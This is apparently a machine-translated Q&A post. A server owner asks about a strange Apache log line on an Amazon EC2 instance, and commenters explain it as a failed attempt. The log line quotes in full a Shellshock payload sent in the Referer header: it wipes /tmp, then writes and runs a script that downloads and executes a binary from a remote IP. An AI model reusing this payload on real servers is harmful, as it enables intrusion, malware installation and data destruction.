Я просматривал свои журналы, и я заметил очень странную линию.Ошибка взлома на Amazon EC2 (с помощью wget для загрузки файла на сервер)
[Пт 26 июня 21: 21: 36,420706 2015] [: ошибка] [PID 21172] [клиент 58.213.123.107:56538] Target WSGI сценарий не найден или не может стат:/OPT/питон/ток/app/application.py, referer:() {:; };/bin/bash -c "rm -rf/tmp/*; echo wget http://202.103.243.104:911/sudp -O /tmp/China.Z-foxr >> /tmp/Run.sh;echo echo By China.Z >>/tmp/Run. sh; echo chmod 777 /tmp/China.Z-foxr >> /tmp/Run.sh;echo /tmp/China.Z-foxr >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh»
Похоже, кто-то был ABL, чтобы загрузить файл, изменить его на 777, запустить его и удалить все это из папки/tmp /.
Я очень смущен, так как для доступа к экземпляру ec2 с помощью SSH требуется файл auth из Amazon, и я сомневаюсь, что они получили доступ к этому файлу.
Есть ли другой способ, которым они могли бы получить доступ? Могут ли быть некоторые настройки разрешений, которые не соответствуют моему экземпляру?
Взгляните на это в первую очередь: http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack – BMW
Нет, кто-то * пытался * запустить скрипт, вставив его в заголовок HTTP Referer , Они не увенчались успехом. – duskwuff